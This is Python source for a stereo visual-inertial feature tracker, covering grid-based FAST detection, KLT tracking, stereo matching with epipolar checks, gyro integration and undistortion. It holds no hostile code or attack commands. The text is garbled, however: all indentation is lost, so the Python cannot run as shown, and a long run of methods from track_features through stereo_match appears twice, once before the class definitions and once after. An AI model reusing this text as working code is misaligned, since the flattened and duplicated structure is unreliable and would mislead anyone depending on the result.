if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
track_inliers[i] = 0
prev_tracked_ids = select(prev_ids, track_inliers)
prev_tracked_lifetime = select(prev_lifetime, track_inliers)
prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)
prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)
curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)
self.num_features['after_tracking'] = len(curr_tracked_cam0_points)
curr_cam1_points, match_inliers = self.stereo_match(
curr_tracked_cam0_points)
prev_matched_ids = select(prev_tracked_ids, match_inliers)
prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)
prev_matched_cam0_points = select(prev_tracked_cam0_points,
match_inliers)
prev_matched_cam1_points = select(prev_tracked_cam1_points,
match_inliers)
curr_matched_cam0_points = select(curr_tracked_cam0_points,
match_inliers)
curr_matched_cam1_points = select(curr_cam1_points, match_inliers)
self.num_features['after_matching'] = len(curr_matched_cam0_points)
cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)
cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)
after_ransac = 0
for i in range(len(cam0_ransac_inliers)):
if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):
continue
row = int(curr_matched_cam0_points[i][1] / grid_height)
col = int(curr_matched_cam0_points[i][0] / grid_width)
code = row * self.config.grid_col + col
grid_new_feature = FeatureMetaData()
grid_new_feature.id = prev_matched_ids[i]
grid_new_feature.lifetime = prev_matched_lifetime[i] + 1
grid_new_feature.cam0_point = curr_matched_cam0_points[i]
grid_new_feature.cam1_point = curr_matched_cam1_points[i]
prev_matched_lifetime[i] += 1
self.curr_features[code].append(grid_new_feature)
after_ransac += 1
self.num_features['after_ransac'] = after_ransac
def add_new_features(self):
"""
Detect new features on the image to ensure that the features are
uniformly distributed on the image.
"""
curr_img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(curr_img)
mask = np.ones(curr_img.shape[:2], dtype='uint8')
for feature in chain.from_iterable(self.curr_features):
x, y = map(int, feature.cam0_point)
mask[y - 3:y + 4, x - 3:x + 4] = 0
new_features = self.detector.detect(curr_img, mask=mask)
new_feature_sieve = [[] for _ in range(self.config.grid_num)]
for feature in new_features:
row = int(feature.pt[1] / grid_height)
col = int(feature.pt[0] / grid_width)
code = row * self.config.grid_col + col
new_feature_sieve[code].append(feature)
new_features = []
for features in new_feature_sieve:
if len(features) > self.config.grid_max_feature_num:
features = sorted(features, key=lambda x: x.response,
reverse=True)[:self.config.grid_max_feature_num]
new_features.append(features)
new_features = list(chain.from_iterable(new_features))
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers, response_inliers = [], [], []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def prune_features(self):
"""
Remove some of the features of a grid in case there are too many
features inside of that grid, which ensures the number of features
within each grid is bounded.
"""
for i, features in enumerate(self.curr_features):
if len(features) <= self.config.grid_max_feature_num:
continue
self.curr_features[i] = sorted(features, key=lambda x: x.
lifetime, reverse=True)[:self.config.grid_max_feature_num]
def load_features(self):
filename = self.config.result_dir + str(self.image_id) + '.npz'
self.curr_features = np.load(filename, allow_pickle=True)['arr_0']
self.image_id += 1
def save_features(self):
filename = self.config.result_dir + str(self.image_id) + '.npz'
np.savez(filename, self.curr_features)
self.image_id += 1
def publish(self):
"""
Publish the features on the current image including both the
tracked and newly detected ones.
"""
curr_ids = []
curr_cam0_points = []
curr_cam1_points = []
for feature in chain.from_iterable(self.curr_features):
curr_ids.append(feature.id)
curr_cam0_points.append(feature.cam0_point)
curr_cam1_points.append(feature.cam1_point)
curr_cam0_points_undistorted = self.undistort_points(curr_cam0_points,
self.cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs)
curr_cam1_points_undistorted = self.undistort_points(curr_cam1_points,
self.cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
features = []
for i in range(len(curr_ids)):
fm = FeatureMeasurement()
fm.id = curr_ids[i]
fm.u0 = curr_cam0_points_undistorted[i][0]
fm.v0 = curr_cam0_points_undistorted[i][1]
fm.u1 = curr_cam1_points_undistorted[i][0]
fm.v1 = curr_cam1_points_undistorted[i][1]
features.append(fm)
feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(self
.cam0_curr_img_msg.timestamp, features)
return feature_msg
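    # The returned feature_msg is a plain namedtuple; a downstream filter
    # can consume it like this (sketch). Note (u0, v0) and (u1, v1) are
    # normalized coordinates, because undistort_points() is called with its
    # default new_intrinsics of [1, 1, 0, 0]:
    #
    #   msg = self.publish()
    #   for fm in msg.features:
    #       print(fm.id, fm.u0, fm.v0, fm.u1, fm.v1)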
def integrate_imu_data(self):
"""
Integrates the IMU gyro readings between the two consecutive images,
which is used for both tracking prediction and 2-point RANSAC.
Returns:
cam0_R_p_c: a rotation matrix which takes a vector from previous
cam0 frame to current cam0 frame.
cam1_R_p_c: a rotation matrix which takes a vector from previous
cam1 frame to current cam1 frame.
"""
idx_begin = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:
idx_begin = i
break
idx_end = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:
idx_end = i
break
if idx_begin is None or idx_end is None:
return np.identity(3), np.identity(3)
mean_ang_vel = np.zeros(3)
for i in range(idx_begin, idx_end):
mean_ang_vel += self.imu_msg_buffer[i].angular_velocity
if idx_end > idx_begin:
mean_ang_vel /= idx_end - idx_begin
cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel
cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel
dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.
timestamp)
cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T
cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T
self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]
return cam0_R_p_c, cam1_R_p_c
def rescale_points(self, pts1, pts2):
"""
Arguments:
pts1: first set of points.
pts2: second set of points.
Returns:
pts1: scaled first set of points.
pts2: scaled second set of points.
scaling_factor: scaling factor
"""
scaling_factor = 0
for pt1, pt2 in zip(pts1, pts2):
scaling_factor += np.linalg.norm(pt1)
scaling_factor += np.linalg.norm(pt2)
scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)
for i in range(len(pts1)):
pts1[i] *= scaling_factor
pts2[i] *= scaling_factor
return pts1, pts2, scaling_factor
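    # Quick check of the normalization above with assumed toy points: after
    # rescaling, the mean norm over both sets equals sqrt(2).
    #
    #   a = [np.array([3.0, 4.0])]           # norm 5
    #   b = [np.array([0.0, 2.0])]           # norm 2
    #   a, b, s = self.rescale_points(a, b)  # s = (2 / 7) * sqrt(2)
    #   # (np.linalg.norm(a[0]) + np.linalg.norm(b[0])) / 2 == sqrt(2)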
def get_grid_size(self, img):
"""
        Size of each grid cell (height, width), in pixels.
"""
grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))
grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))
return grid_height, grid_width
def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):
"""
        Compensates the rotation between consecutive camera frames so that
        feature tracking is more robust and fast.
Arguments:
input_pts: features in the previous image to be tracked.
R_p_c: a rotation matrix takes a vector in the previous camera
frame to the current camera frame. (matrix33)
intrinsics: intrinsic matrix of the camera. (vec3)
Returns:
compensated_pts: predicted locations of the features in the
current image based on the provided rotation.
"""
if len(input_pts) == 0:
return []
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
H = K @ R_p_c @ np.linalg.inv(K)
compensated_pts = []
for i in range(len(input_pts)):
p1 = np.array([*input_pts[i], 1.0])
p2 = H @ p1
compensated_pts.append(p2[:2] / p2[2])
return np.array(compensated_pts, dtype=np.float32)
def stereo_match(self, cam0_points):
"""
Matches features with stereo image pairs.
Arguments:
cam0_points: points in the primary image.
Returns:
cam1_points: points in the secondary image.
inlier_markers: 1 if the match is valid, 0 otherwise.
"""
cam0_points = np.array(cam0_points)
        if len(cam0_points) == 0:
            # Callers unpack two values, so return an empty pair.
            return [], []
R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu
cam0_points_undistorted = self.undistort_points(cam0_points, self.
cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs, R_cam0_cam1)
cam1_points = self.distort_points(cam0_points_undistorted, self.
cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
cam1_points_copy = cam1_points.copy()
cam0_points = cam0_points.astype(np.float32)
cam1_points = cam1_points.astype(np.float32)
cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(self.
curr_cam0_pyramid, self.curr_cam1_pyramid, cam0_points,
cam1_points, **self.config.lk_params)
cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(self.
curr_cam1_pyramid, self.curr_cam0_pyramid, cam1_points,
cam0_points.copy(), **self.config.lk_params)
err = np.linalg.norm(cam0_points - cam0_points_, axis=1)
disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])
inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),
err < 3, disparity < 20])
img = self.cam1_curr_img_msg.image
for i, point in enumerate(cam1_points):
if not inlier_markers[i]:
continue
if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
inlier_markers[i] = 0
t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)
E = skew(t_cam0_cam1) @ R_cam0_cam1
cam0_points_undistorted = self.undistort_points(cam0_points, self.
cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs)
cam1_points_undistorted = self.undistort_points(cam1_points, self.
cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
norm_pixel_unit = 4.0 / (self.cam0_intrinsics[0] + self.
cam0_intrinsics[1] + self.cam1_intrinsics[0] + self.
cam1_intrinsics[1])
for i in range(len(cam0_points_undistorted)):
if not inlier_markers[i]:
continue
pt0 = np.array([*cam0_points_undistorted[i], 1.0])
pt1 = np.array([*cam1_points_undistorted[i], 1.0])
epipolar_line = E @ pt0
            error = np.abs((pt1 * epipolar_line).sum()) / np.linalg.norm(
                epipolar_line[:2])
if error > self.config.stereo_threshold * norm_pixel_unit:
inlier_markers[i] = 0
return cam1_points, inlier_markers
def undistort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs, rectification_matrix=np.identity(3),
new_intrinsics=np.array([1, 1, 0, 0])):
"""
Arguments:
pts_in: points to be undistorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
            rectification_matrix: rotation applied to the normalized points
                before reprojection (defaults to identity).
            new_intrinsics: intrinsics of the output frame; the default
                [1, 1, 0, 0] yields normalized coordinates.
Returns:
pts_out: undistorted points.
"""
if len(pts_in) == 0:
return []
pts_in = np.reshape(pts_in, (-1, 1, 2))
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
K_new = np.array([[new_intrinsics[0], 0.0, new_intrinsics[2]], [0.0,
new_intrinsics[1], new_intrinsics[3]], [0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.undistortPoints(pts_in, K,
distortion_coeffs, rectification_matrix, K_new)
else:
pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,
None, rectification_matrix, K_new)
return pts_out.reshape((-1, 2))
def distort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs):
"""
Arguments:
pts_in: points to be distorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
Returns:
pts_out: distorted points. (N, 2)
"""
if len(pts_in) == 0:
return []
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)
else:
homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)
pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3), np.
zeros(3), K, distortion_coeffs)
return pts_out.reshape((-1, 2))
def draw_features_stereo(self):
img0 = self.cam0_curr_img_msg.image
img1 = self.cam1_curr_img_msg.image
kps0 = []
kps1 = []
matches = []
for feature in chain.from_iterable(self.curr_features):
matches.append(cv2.DMatch(len(kps0), len(kps0), 0))
kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))
kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))
img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)
cv2.imshow('stereo features', img)
cv2.waitKey(1)
class FeatureMeasurement(object):
    """
    Stereo measurement of a feature.
    """
def __init__(self):
self.id = None
self.u0 = None
self.v0 = None
self.u1 = None
self.v1 = None
class ImageProcessor(object):
"""
Detect and track features in image sequences.
"""
def __init__(self, config):
self.config = config
self.is_first_img = True
self.next_feature_id = 0
self.detector = cv2.FastFeatureDetector_create(self.config.
fast_threshold)
self.imu_msg_buffer = []
self.cam0_prev_img_msg = None
self.cam0_curr_img_msg = None
self.cam1_curr_img_msg = None
self.prev_cam0_pyramid = None
self.curr_cam0_pyramid = None
self.curr_cam1_pyramid = None
self.prev_features = [[] for _ in range(self.config.grid_num)]
self.curr_features = [[] for _ in range(self.config.grid_num)]
self.num_features = defaultdict(int)
self.cam0_resolution = config.cam0_resolution
self.cam0_intrinsics = config.cam0_intrinsics
self.cam0_distortion_model = config.cam0_distortion_model
self.cam0_distortion_coeffs = config.cam0_distortion_coeffs
self.cam1_resolution = config.cam1_resolution
self.cam1_intrinsics = config.cam1_intrinsics
self.cam1_distortion_model = config.cam1_distortion_model
self.cam1_distortion_coeffs = config.cam1_distortion_coeffs
self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)
self.R_cam0_imu = self.T_cam0_imu[:3, :3]
self.t_cam0_imu = self.T_cam0_imu[:3, 3]
self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)
self.R_cam1_imu = self.T_cam1_imu[:3, :3]
self.t_cam1_imu = self.T_cam1_imu[:3, 3]
self.image_id = 0
def stereo_callback(self, stereo_msg):
"""
Callback function for the stereo images.
"""
start = time.time()
self.cam0_curr_img_msg = stereo_msg.cam0_msg
self.cam1_curr_img_msg = stereo_msg.cam1_msg
self.create_image_pyramids()
if self.is_first_img:
if not self.config.load_features_flag:
self.initialize_first_frame()
self.is_first_img = False
elif not self.config.load_features_flag:
t = time.time()
self.track_features()
print('___track_features:', time.time() - t)
t = time.time()
self.add_new_features()
print('___add_new_features:', time.time() - t)
t = time.time()
self.prune_features()
print('___prune_features:', time.time() - t)
            t = time.time()
            # self.draw_features_stereo()  # optional visualization, disabled
            print('___draw_features_stereo:', time.time() - t)
print('===image process elapsed:', time.time() - start,
f'({stereo_msg.timestamp})')
if not self.config.load_features_flag:
try:
self.save_features()
return self.publish()
finally:
self.cam0_prev_img_msg = self.cam0_curr_img_msg
self.prev_features = self.curr_features
self.prev_cam0_pyramid = self.curr_cam0_pyramid
self.curr_features = [[] for _ in range(self.config.grid_num)]
else:
self.load_features()
return self.publish()
def imu_callback(self, msg):
"""
Callback function for the imu message.
"""
self.imu_msg_buffer.append(msg)
def create_image_pyramids(self):
"""
Create image pyramids used for KLT tracking.
        (Pyramid construction seems not to work from Python, so the raw
        image is used directly.)
"""
curr_cam0_img = self.cam0_curr_img_msg.image
self.curr_cam0_pyramid = curr_cam0_img
curr_cam1_img = self.cam1_curr_img_msg.image
self.curr_cam1_pyramid = curr_cam1_img
def initialize_first_frame(self):
"""
        Initialize the image processing sequence, which basically detects
        new features on the first set of stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
new_features = self.detector.detect(img)
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers = [], []
response_inliers = []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def track_features(self):
"""
        Track features on the newly received stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()
prev_ids = []
prev_lifetime = []
prev_cam0_points = []
prev_cam1_points = []
for feature in chain.from_iterable(self.prev_features):
prev_ids.append(feature.id)
prev_lifetime.append(feature.lifetime)
prev_cam0_points.append(feature.cam0_point)
prev_cam1_points.append(feature.cam1_point)
prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)
self.num_features['before_tracking'] = len(prev_cam0_points)
if len(prev_cam0_points) == 0:
return
curr_cam0_points = self.predict_feature_tracking(prev_cam0_points,
cam0_R_p_c, self.cam0_intrinsics)
curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(self.
prev_cam0_pyramid, self.curr_cam0_pyramid, prev_cam0_points.
astype(np.float32), curr_cam0_points.astype(np.float32), **self
.config.lk_params)
for i, point in enumerate(curr_cam0_points):
if not track_inliers[i]:
continue
if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
track_inliers[i] = 0
prev_tracked_ids = select(prev_ids, track_inliers)
prev_tracked_lifetime = select(prev_lifetime, track_inliers)
prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)
prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)
curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)
self.num_features['after_tracking'] = len(curr_tracked_cam0_points)
curr_cam1_points, match_inliers = self.stereo_match(
curr_tracked_cam0_points)
prev_matched_ids = select(prev_tracked_ids, match_inliers)
prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)
prev_matched_cam0_points = select(prev_tracked_cam0_points,
match_inliers)
prev_matched_cam1_points = select(prev_tracked_cam1_points,
match_inliers)
curr_matched_cam0_points = select(curr_tracked_cam0_points,
match_inliers)
curr_matched_cam1_points = select(curr_cam1_points, match_inliers)
self.num_features['after_matching'] = len(curr_matched_cam0_points)
cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)
cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)
after_ransac = 0
for i in range(len(cam0_ransac_inliers)):
if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):
continue
row = int(curr_matched_cam0_points[i][1] / grid_height)
col = int(curr_matched_cam0_points[i][0] / grid_width)
code = row * self.config.grid_col + col
grid_new_feature = FeatureMetaData()
grid_new_feature.id = prev_matched_ids[i]
grid_new_feature.lifetime = prev_matched_lifetime[i] + 1
grid_new_feature.cam0_point = curr_matched_cam0_points[i]
grid_new_feature.cam1_point = curr_matched_cam1_points[i]
prev_matched_lifetime[i] += 1
self.curr_features[code].append(grid_new_feature)
after_ransac += 1
self.num_features['after_ransac'] = after_ransac
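    # The select() helper used above is defined outside this excerpt; the
    # assumed behavior is boolean masking over a list:
    #
    #   def select(data, selectors):
    #       return [d for d, s in zip(data, selectors) if s]
    #
    # Also note that cam0_ransac_inliers and cam1_ransac_inliers are set to
    # all ones, i.e. the 2-point RANSAC mentioned in integrate_imu_data()
    # is effectively disabled in this port.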
def add_new_features(self):
"""
Detect new features on the image to ensure that the features are
uniformly distributed on the image.
"""
curr_img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(curr_img)
mask = np.ones(curr_img.shape[:2], dtype='uint8')
for feature in chain.from_iterable(self.curr_features):
x, y = map(int, feature.cam0_point)
mask[y - 3:y + 4, x - 3:x + 4] = 0
new_features = self.detector.detect(curr_img, mask=mask)
new_feature_sieve = [[] for _ in range(self.config.grid_num)]
for feature in new_features:
row = int(feature.pt[1] / grid_height)
col = int(feature.pt[0] / grid_width)
code = row * self.config.grid_col + col
new_feature_sieve[code].append(feature)
new_features = []
for features in new_feature_sieve:
if len(features) > self.config.grid_max_feature_num:
features = sorted(features, key=lambda x: x.response,
reverse=True)[:self.config.grid_max_feature_num]
new_features.append(features)
new_features = list(chain.from_iterable(new_features))
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers, response_inliers = [], [], []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def prune_features(self):
"""
Remove some of the features of a grid in case there are too many
features inside of that grid, which ensures the number of features
within each grid is bounded.
"""
for i, features in enumerate(self.curr_features):
if len(features) <= self.config.grid_max_feature_num:
continue
self.curr_features[i] = sorted(features, key=lambda x: x.
lifetime, reverse=True)[:self.config.grid_max_feature_num]
def load_features(self):
filename = self.config.result_dir + str(self.image_id) + '.npz'
self.curr_features = np.load(filename, allow_pickle=True)['arr_0']
self.image_id += 1
def save_features(self):
filename = self.config.result_dir + str(self.image_id) + '.npz'
np.savez(filename, self.curr_features)
self.image_id += 1
def publish(self):
"""
Publish the features on the current image including both the
tracked and newly detected ones.
"""
curr_ids = []
curr_cam0_points = []
curr_cam1_points = []
for feature in chain.from_iterable(self.curr_features):
curr_ids.append(feature.id)
curr_cam0_points.append(feature.cam0_point)
curr_cam1_points.append(feature.cam1_point)
curr_cam0_points_undistorted = self.undistort_points(curr_cam0_points,
self.cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs)
curr_cam1_points_undistorted = self.undistort_points(curr_cam1_points,
self.cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
features = []
for i in range(len(curr_ids)):
fm = FeatureMeasurement()
fm.id = curr_ids[i]
fm.u0 = curr_cam0_points_undistorted[i][0]
fm.v0 = curr_cam0_points_undistorted[i][1]
fm.u1 = curr_cam1_points_undistorted[i][0]
fm.v1 = curr_cam1_points_undistorted[i][1]
features.append(fm)
feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(self
.cam0_curr_img_msg.timestamp, features)
return feature_msg
def integrate_imu_data(self):
"""
Integrates the IMU gyro readings between the two consecutive images,
which is used for both tracking prediction and 2-point RANSAC.
Returns:
cam0_R_p_c: a rotation matrix which takes a vector from previous
cam0 frame to current cam0 frame.
cam1_R_p_c: a rotation matrix which takes a vector from previous
cam1 frame to current cam1 frame.
"""
idx_begin = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:
idx_begin = i
break
idx_end = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:
idx_end = i
break
if idx_begin is None or idx_end is None:
return np.identity(3), np.identity(3)
mean_ang_vel = np.zeros(3)
for i in range(idx_begin, idx_end):
mean_ang_vel += self.imu_msg_buffer[i].angular_velocity
if idx_end > idx_begin:
mean_ang_vel /= idx_end - idx_begin
cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel
cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel
dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.
timestamp)
cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T
cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T
self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]
return cam0_R_p_c, cam1_R_p_c
def rescale_points(self, pts1, pts2):
"""
Arguments:
pts1: first set of points.
pts2: second set of points.
Returns:
pts1: scaled first set of points.
pts2: scaled second set of points.
scaling_factor: scaling factor
"""
scaling_factor = 0
for pt1, pt2 in zip(pts1, pts2):
scaling_factor += np.linalg.norm(pt1)
scaling_factor += np.linalg.norm(pt2)
scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)
for i in range(len(pts1)):
pts1[i] *= scaling_factor
pts2[i] *= scaling_factor
return pts1, pts2, scaling_factor
def get_grid_size(self, img):
"""
        Size of each grid cell (height, width), in pixels.
"""
grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))
grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))
return grid_height, grid_width
def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):
"""
        Compensates the rotation between consecutive camera frames so that
        feature tracking is more robust and fast.
Arguments:
input_pts: features in the previous image to be tracked.
R_p_c: a rotation matrix takes a vector in the previous camera
frame to the current camera frame. (matrix33)
intrinsics: intrinsic matrix of the camera. (vec3)
Returns:
compensated_pts: predicted locations of the features in the
current image based on the provided rotation.
"""
if len(input_pts) == 0:
return []
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
H = K @ R_p_c @ np.linalg.inv(K)
compensated_pts = []
for i in range(len(input_pts)):
p1 = np.array([*input_pts[i], 1.0])
p2 = H @ p1
compensated_pts.append(p2[:2] / p2[2])
return np.array(compensated_pts, dtype=np.float32)
def stereo_match(self, cam0_points):
"""
Matches features with stereo image pairs.
Arguments:
cam0_points: points in the primary image.
Returns:
cam1_points: points in the secondary image.
inlier_markers: 1 if the match is valid, 0 otherwise.
"""
cam0_points = np.array(cam0_points)
        if len(cam0_points) == 0:
            # Callers unpack two values, so return an empty pair.
            return [], []
R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu
cam0_points_undistorted = self.undistort_points(cam0_points, self.
cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs, R_cam0_cam1)
cam1_points = self.distort_points(cam0_points_undistorted, self.
cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
cam1_points_copy = cam1_points.copy()
cam0_points = cam0_points.astype(np.float32)
cam1_points = cam1_points.astype(np.float32)
cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(self.
curr_cam0_pyramid, self.curr_cam1_pyramid, cam0_points,
cam1_points, **self.config.lk_params)
cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(self.
curr_cam1_pyramid, self.curr_cam0_pyramid, cam1_points,
cam0_points.copy(), **self.config.lk_params)
err = np.linalg.norm(cam0_points - cam0_points_, axis=1)
disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])
inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),
err < 3, disparity < 20])
img = self.cam1_curr_img_msg.image
for i, point in enumerate(cam1_points):
if not inlier_markers[i]:
continue
if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
inlier_markers[i] = 0
t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)
E = skew(t_cam0_cam1) @ R_cam0_cam1
cam0_points_undistorted = self.undistort_points(cam0_points, self.
cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs)
cam1_points_undistorted = self.undistort_points(cam1_points, self.
cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
norm_pixel_unit = 4.0 / (self.cam0_intrinsics[0] + self.
cam0_intrinsics[1] + self.cam1_intrinsics[0] + self.
cam1_intrinsics[1])
